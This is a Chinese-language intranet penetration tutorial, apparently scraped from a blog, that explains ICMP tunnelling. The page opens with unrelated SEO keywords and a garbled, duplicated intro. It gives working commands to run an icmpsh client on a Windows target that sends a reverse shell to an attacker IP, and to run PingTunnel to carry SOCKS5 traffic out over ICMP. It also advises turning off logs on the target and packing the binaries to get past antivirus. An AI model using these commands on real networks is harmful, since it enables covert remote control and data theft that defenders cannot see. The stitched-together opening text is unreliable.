如何扫描一个网站的漏洞,个人个案网站 类型,南京网络推广公司排行榜,wordpress文章重复在内网渗透中#xff0c;当目标主机仅允许 ICMP 协议出网#xff08;例如防火墙只放行 Ping 请求#xff09;时#xff0c;传统的 TCP/UDP 反弹 Shell 或数据传输方式将失效。此时#xff0c;我们可以利用 ICMP 隧道 技术#xff0c;将其他协议的数据封装在 ICMP 报文内部…在内网渗透中当目标主机仅允许 ICMP 协议出网例如防火墙只放行 Ping 请求时传统的 TCP/UDP 反弹 Shell 或数据传输方式将失效。此时我们可以利用ICMP 隧道技术将其他协议的数据封装在 ICMP 报文内部实现隐蔽通信。本文将介绍 ICMP 隧道的基本原理并详细讲解两款常用工具 ——icmpsh和PingTunnel的使用方法。1. ICMP 隧道概述1.1 ICMP 协议特点无端口ICMP 位于网络层不依赖 TCP/UDP 端口而是通过类型和代码字段区分消息。广泛支持几乎所有网络设备都支持 ICMP尤其是用于网络诊断的ping命令。防火墙友好许多防火墙允许 ICMP 流量通过以保持网络的可诊断性。1.2 隧道工作原理封装数据攻击者将待传输的数据如 Shell 交互、TCP 流量放入 ICMP Echo Requestping 请求的数据负载字段。发送请求将封装后的 ICMP 包发送至目标主机。解封处理目标主机收到后提取数据并执行相应操作如启动 Shell。回传响应目标主机通过 ICMP Echo Replyping 回复将结果数据封装并返回。由于 ICMP 流量通常被允许且不易被深度检查这种隧道具备良好的隐蔽性。2. 工具一icmpsh —— 轻量级 ICMP 反弹 Shellicmpsh是一款专门用于通过 ICMP 协议反弹 Shell 的工具支持 Windows 和 Linux 目标。它需要攻击机服务端和目标机客户端配合使用。2.1 环境准备攻击机Linux需 Python2 及impacket库目标机Windows运行 icmpsh.exe2.2 攻击机操作关闭系统对 ICMP Echo 的自动回复默认情况下Linux 内核会自动响应 Ping 请求这会影响 icmpsh 的正常工作。需要临时禁用sysctl -w net.ipv4.icmp_echo_ignore_all1恢复命令sysctl -w net.ipv4.icmp_echo_ignore_all0启动服务端监听icmpsh 服务端脚本为icmpsh_m.pyPython2需指定两个 IP第一个参数攻击机本机 IP用于接收连接第二个参数目标机的公网出口 IP用于伪装源地址可通过在线查询获取python2 icmpsh_m.py 攻击机IP 目标机出口IP 示例python2 icmpsh_m.py 172.20.92.13 123.123.123.1232.3 目标机操作在目标 Windows 主机上执行 icmpsh 客户端需上传icmpsh.exeicmpsh.exe -t 攻击机IP -d 500 -b 30 -s 128参数说明-t指定攻击机 IP 地址。-d请求间隔毫秒默认 200。-b退出前允许的最大连续未应答数。-s最大数据缓冲区大小字节默认 64。执行后若攻击机服务端出现 Shell 交互界面则隧道建立成功。2.4 验证流量在攻击机或目标机上使用 Wireshark 抓包过滤icmp即可看到数据在 ICMP 负载中传输。3. 工具二PingTunnel —— 强大的 ICMP 隧道转发PingTunnel是一款功能更全面的 ICMP 隧道工具支持将 TCP、UDP 甚至 SOCKS5 流量封装为 ICMP 数据包进行转发。它分为服务端和客户端适合搭建稳定的代理通道。项目地址https://github.com/esrrhs/pingtunnel3.1 工作原理服务端部署在攻击机VPS上监听 ICMP 流量并将其解封后转发至指定目标如内网其他机器或本地的 SOCKS5 服务。客户端部署在目标机上将本地流量如浏览器代理封装成 ICMP 包发送至服务端。3.2 服务端配置攻击机同样需关闭 ICMP 自动回复与 icmpsh 相同sysctl -w net.ipv4.icmp_echo_ignore_all1启动 PingTunnel 服务端./pingtunnel -type server -noprint 1 -nolog 1-type server指定为服务端模式。-noprint 1不打印屏幕输出。-nolog 1不写日志文件。若需设置密码可添加-key 密码。3.3 客户端配置目标机在目标 Windows 主机上运行客户端需上传pingtunnel.exepingtunnel.exe -type client -l :1080 -s 攻击机IP -sock5 1 -noprint 1 -nolog 1-type client客户端模式。-l :1080本地监听 1080 端口作为 SOCKS5 代理入口。-s 攻击机IP指定服务端 IP。-sock5 1启用 SOCKS5 转发功能。-noprint/-nolog关闭输出和日志可选。3.4 参数详解参数服务端描述默认值-key设置的密码0无密码-nolog不写日志文件只打印标准输出0写日志-noprint不打印屏幕输出0打印-loglevel日志等级debug/info/warn/errorinfo-maxconn最大连接数0不限制-maxprt服务器最大处理线程数100-maxprb处理线程缓冲区大小1000-conntt连接目标地址的超时时间毫秒1000参数客户端描述默认值-l本地监听地址如:1080无-s服务器地址无-t远端转发目标直接转发模式无-timeout连接超时秒60-key密码需与服务端一致0-tcp是否转发 TCP1 为是0-tcp_bsTCP 缓冲区大小1MB-tcp_mwTCP 最大窗口20000-tcp_rstTCP 超时重发时间400ms-tcp_gz数据压缩阈值0 为不压缩0-sock5开启 SOCKS5 转发1 为是0-profile性能检测端口0不开启3.5 使用示例客户端启动后本地 SOCKS5 代理地址为127.0.0.1:1080。将浏览器或工具配置为 SOCKS5 代理所有流量将通过 ICMP 隧道从目标机转发至攻击机再由攻击机访问互联网或内网资源。4. 总结与注意事项4.1 适用场景目标主机防火墙仅允许 ICMP 出站。需要隐蔽通信避免端口扫描或深度包检测。临时绕过网络限制建立 socks5 代理或反弹 Shell。4.2 注意事项关闭 ICMP 回复在攻击机服务端上必须执行sysctl -w net.ipv4.icmp_echo_ignore_all1否则内核会响应 Ping 包干扰隧道数据。权限要求icmpsh 和 PingTunnel 在目标机上执行可能需要管理员权限尤其是 Windows 下。流量特征虽然 ICMP 隧道相对隐蔽但大量 ICMP 包或异常大的数据负载仍可能被 IDS/IPS 检测。建议控制发送频率和数据包大小。工具免杀部分杀毒软件会将 icmpsh.exe 或 pingtunnel.exe 标记为黑客工具上传前可考虑加壳或编码处理。恢复设置测试结束后记得将攻击机的icmp_echo_ignore_all恢复为 0以免影响正常 Ping 功能。